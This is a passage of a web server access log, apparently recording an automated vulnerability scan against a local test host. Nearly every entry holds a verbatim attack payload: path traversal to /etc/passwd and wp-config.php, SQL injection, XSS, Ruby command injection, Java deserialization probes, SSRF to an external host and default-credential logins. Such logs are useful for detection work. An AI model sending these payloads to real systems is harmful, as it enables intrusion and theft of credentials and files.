Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?q=node&destination=node HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bower.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aam-media=wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Reports/Pages/Folder.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"action=wpcf7r_get_nonce¶m=wp_rest","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"cat_id=4'&get_seleted_Category=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /homeaction.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fosagent/repl/download-file?basedir=4&filepath=..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/upload/web-ftp.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /runningpods/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/JMXInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fosagent/repl/download-snapshot?name=..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Thumbs.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/EJBInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensso/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /1.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LICENSE.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/keys/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docpicker/internal_proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 